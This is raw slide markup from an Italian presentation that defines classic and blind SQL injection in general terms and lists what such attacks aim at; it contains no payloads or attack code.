              <a:t>In Esame</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 30" id="30"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="10131321" y="5835265"/>
            <a:ext cx="738805" cy="357655"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="2857"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2041">
                <a:solidFill>
                  <a:srgbClr val="121212"/>
                </a:solidFill>
                <a:latin typeface="Open Sans Bold"/>
                <a:ea typeface="Open Sans Bold"/>
                <a:cs typeface="Open Sans Bold"/>
                <a:sym typeface="Open Sans Bold"/>
              </a:rPr>
              <a:t>01</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 31" id="31"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="11294787" y="5637002"/>
            <a:ext cx="5425503" cy="54991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HK Modular"/>
                <a:ea typeface="HK Modular"/>
                <a:cs typeface="HK Modular"/>
                <a:sym typeface="HK Modular"/>
              </a:rPr>
              <a:t>Iniezione SQL Classica (Classic SQL Injection)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 32" id="32"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="10131321" y="7292375"/>
            <a:ext cx="738805" cy="357655"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="2857"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2041">
                <a:solidFill>
                  <a:srgbClr val="121212"/>
                </a:solidFill>
                <a:latin typeface="Open Sans Bold"/>
                <a:ea typeface="Open Sans Bold"/>
                <a:cs typeface="Open Sans Bold"/>
                <a:sym typeface="Open Sans Bold"/>
              </a:rPr>
              <a:t>02</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 33" id="33"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="11309793" y="7339122"/>
            <a:ext cx="5425503" cy="273685"/>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HK Modular"/>
                <a:ea typeface="HK Modular"/>
                <a:cs typeface="HK Modular"/>
                <a:sym typeface="HK Modular"/>
              </a:rPr>
              <a:t>Iniezione SQL Blind</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="fast">
    <p:cover dir="l"/>
  </p:transition>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3" id="3"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="9276005" y="0"/>
            <a:ext cx="4510760" cy="10287000"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="6014346" cy="13716000"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr name="Picture 4" id="4"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="true"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3"/>
            <a:srcRect l="29293" t="0" r="46041" b="0"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm flipH="false" flipV="false">
              <a:off x="0" y="0"/>
              <a:ext cx="6014346" cy="13716000"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 5" id="5"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="13777240" y="0"/>
            <a:ext cx="4510760" cy="10287000"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="6014346" cy="13716000"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr name="Picture 6" id="6"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="true"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId4"/>
            <a:srcRect l="54181" t="0" r="16549" b="0"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm flipH="false" flipV="false">
              <a:off x="0" y="0"/>
              <a:ext cx="6014346" cy="13716000"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 7" id="7"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="519925" y="9502973"/>
            <a:ext cx="402082" cy="402082"/>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9" id="9"/>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10" id="10"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="1145500" y="9595504"/>
            <a:ext cx="1379782" cy="197971"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just">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1" id="11"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="519925"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14</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 12" id="12"/>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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 13" id="13"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="8884990" y="9390705"/>
            <a:ext cx="782032" cy="1028700"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="556429" cy="731937"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="Freeform 14" id="14"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="false" flipV="false" rot="0">
              <a:off x="0" y="0"/>
              <a:ext cx="556429" cy="731937"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect r="r" b="b" t="t" l="l"/>
              <a:pathLst>
                <a:path h="731937" w="556429">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="556429" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="556429" y="731937"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="731937"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="ABDB2A">
                <a:alpha val="74902"/>
              </a:srgbClr>
            </a:solidFill>
          </p:spPr>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="TextBox 15" id="15"/>
            <p:cNvSpPr txBox="true"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="-28575"/>
              <a:ext cx="556429" cy="760512"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr anchor="ctr" rtlCol="false" tIns="50800" lIns="50800" bIns="50800" rIns="50800"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr">
                <a:lnSpc>
                  <a:spcPts val="2239"/>
                </a:lnSpc>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 16" id="16"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="13395749" y="0"/>
            <a:ext cx="782032" cy="3118333"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="556429" cy="2218746"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="Freeform 17" id="17"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="false" flipV="false" rot="0">
              <a:off x="0" y="0"/>
              <a:ext cx="556429" cy="2218746"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect r="r" b="b" t="t" l="l"/>
              <a:pathLst>
                <a:path h="2218746" w="556429">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="556429" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="556429" y="2218746"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="2218746"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="ABDB2A">
                <a:alpha val="74902"/>
              </a:srgbClr>
            </a:solidFill>
          </p:spPr>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="TextBox 18" id="18"/>
            <p:cNvSpPr txBox="true"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="-28575"/>
              <a:ext cx="556429" cy="2247321"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr anchor="ctr" rtlCol="false" tIns="50800" lIns="50800" bIns="50800" rIns="50800"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr">
                <a:lnSpc>
                  <a:spcPts val="2239"/>
                </a:lnSpc>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 19" id="19"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="519925" y="1224391"/>
            <a:ext cx="7902165" cy="1793990"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="4778"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3413">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="HK Modular"/>
                <a:ea typeface="HK Modular"/>
                <a:cs typeface="HK Modular"/>
                <a:sym typeface="HK Modular"/>
              </a:rPr>
              <a:t>Iniezione SQL Classica (Classic SQL Injection)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 20" id="20"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="519925" y="3018381"/>
            <a:ext cx="1618141" cy="99952"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="1151334" cy="71118"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="Freeform 21" id="21"/>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22" id="22"/>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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 23" id="23"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="519925" y="4425162"/>
            <a:ext cx="6917593" cy="1875677"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="1913890" cy="518943"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="Freeform 24" id="24"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="false" flipV="false" rot="0">
              <a:off x="0" y="0"/>
              <a:ext cx="1913890" cy="518943"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect r="r" b="b" t="t" l="l"/>
              <a:pathLst>
                <a:path h="518943" w="1913890">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1913890" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1913890" y="518943"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="518943"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="ABDB2A"/>
            </a:solidFill>
          </p:spPr>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 25" id="25"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="633586" y="4566409"/>
            <a:ext cx="6690271" cy="1534264"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="2059"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1470">
                <a:solidFill>
                  <a:srgbClr val="121212"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>L'iniezione SQL Classica (Classic SQL Injection) è un tipo di attacco informatico che sfrutta le vulnerabilità nelle applicazioni web che interagiscono con un database. Questo attacco avviene quando un utente malintenzionato inserisce codice SQL malevolo all'interno di campi di input dell'applicazione, come moduli di login, campi di ricerca o URL, che viene poi eseguito direttamente dal database.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 26" id="26"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="519925" y="6484780"/>
            <a:ext cx="6917593" cy="2836228"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="1913890" cy="784699"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="Freeform 27" id="27"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="false" flipV="false" rot="0">
              <a:off x="0" y="0"/>
              <a:ext cx="1913890" cy="784699"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect r="r" b="b" t="t" l="l"/>
              <a:pathLst>
                <a:path h="784699" w="1913890">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1913890" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1913890" y="784699"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="784699"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="ABDB2A"/>
            </a:solidFill>
          </p:spPr>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 28" id="28"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="633586" y="6538158"/>
            <a:ext cx="6690271" cy="2964815"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="1960"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="121212"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>L'iniezione SQL Classica avviene attraverso la manipolazione di query SQL legittime.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="1960"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="121212"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>Quando un'applicazione non valida o sanifica adeguatamente i dati di input forniti dall'utente, un attaccante può inserire comandi SQL malevoli per:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" marL="302261" indent="-151130" lvl="1">
              <a:lnSpc>
                <a:spcPts val="1960"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="121212"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>Spoofing dell'Identità: Accedere come un altro utente senza conoscere la password.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" marL="302261" indent="-151130" lvl="1">
              <a:lnSpc>
                <a:spcPts val="1960"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="121212"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>Manomissione dei Dati: Modificare, inserire o cancellare dati nel database.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" marL="302261" indent="-151130" lvl="1">
              <a:lnSpc>
                <a:spcPts val="1960"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="121212"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>Estrazione dei Dati: Ottenere informazioni sensibili dal databaseDistruzione dei Dati: Eliminare dati cruciali.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" marL="302261" indent="-151130" lvl="1">
              <a:lnSpc>
                <a:spcPts val="1960"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="121212"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>Elevazione dei Privilegi: Ottenere privilegi amministrativi all'interno del database.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="1960"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr name="Picture 29" id="29"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="true"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="451518" y="3155418"/>
            <a:ext cx="820879" cy="820879"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 30" id="30"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="527882" y="4023387"/>
            <a:ext cx="668152" cy="287475"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="1174"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="839">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>Classic SQL Injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 31" id="31"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="1328996" y="3460535"/>
            <a:ext cx="7794161" cy="543884"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="2213"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1581" spc="542">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>PERCENTUALE DI UTILIZZO (DATI AGGIORNATI AL 2023)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 32" id="32"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="1328996" y="4058510"/>
            <a:ext cx="7794161" cy="99952"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="5545675" cy="71118"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="Freeform 33" id="33"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="false" flipV="false" rot="0">
              <a:off x="0" y="0"/>
              <a:ext cx="5545675" cy="71118"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect r="r" b="b" t="t" l="l"/>
              <a:pathLst>
                <a:path h="71118" w="5545675">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="5545675" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5545675" y="71118"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="71118"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="ABDB2A"/>
            </a:solidFill>
          </p:spPr>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="TextBox 34" id="34"/>
            <p:cNvSpPr txBox="true"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="-28575"/>
              <a:ext cx="5545675" cy="99693"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr anchor="ctr" rtlCol="false" tIns="50800" lIns="50800" bIns="50800" rIns="50800"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr">
                <a:lnSpc>
                  <a:spcPts val="2239"/>
                </a:lnSpc>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 35" id="35"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="1328996" y="3305361"/>
            <a:ext cx="7794161" cy="99952"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="5545675" cy="71118"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="Freeform 36" id="36"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="false" flipV="false" rot="0">
              <a:off x="0" y="0"/>
              <a:ext cx="5545675" cy="71118"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect r="r" b="b" t="t" l="l"/>
              <a:pathLst>
                <a:path h="71118" w="5545675">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="5545675" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5545675" y="71118"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="71118"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="ABDB2A"/>
            </a:solidFill>
          </p:spPr>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="TextBox 37" id="37"/>
